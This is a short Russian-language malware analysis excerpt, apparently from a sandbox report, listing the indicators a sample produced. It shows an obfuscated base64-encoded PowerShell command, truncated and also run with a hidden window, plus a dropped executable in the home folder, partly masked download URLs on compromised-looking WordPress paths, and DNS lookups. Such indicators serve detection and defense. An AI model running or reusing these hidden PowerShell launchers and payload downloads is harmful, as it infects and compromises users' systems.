Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAEEAQQBvAEQAUQBBAD0AKAAnAGEAQQAnACsAJwBBACcAKwAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGsAVQAnACwAJwBfAEEAJwApACkAOwAkAFUAWgBBAFEAQQBaAFEAdwAgAD0AIAAoACcANAAzACcAKwAnADgAJwApADsAJAB3AFEAXwB...
- %HOMEPATH%\438.exe
- http://hs#.pw/e5t9/zbqlHAhTtRZd/
- http://me##and.com/wp-content/akMmnMBbAPswO/
- http://jo##tud.ru/wp-includes/QIUEwMypGbuDbhAaEimcRofGNckbVn/
- http://jo##tud.ru/
- DNS ASK de###usa.com
- DNS ASK pl##n.com
- DNS ASK hs#.pw
- DNS ASK me##and.com
- DNS ASK jo##tud.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAEEAQQBvAEQAUQBBAD0AKAAnAGEAQQAnACsAJwBBACcAKwAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGsAVQAnACwAJwBfAEEAJwApACkAOwAkAFUAWgBBAFEAQQBaAFEAdwAgAD0AIAAoACcANAAzACcAKwAnADgAJwApADsAJAB3AFEAXwB...' (со скрытым окном)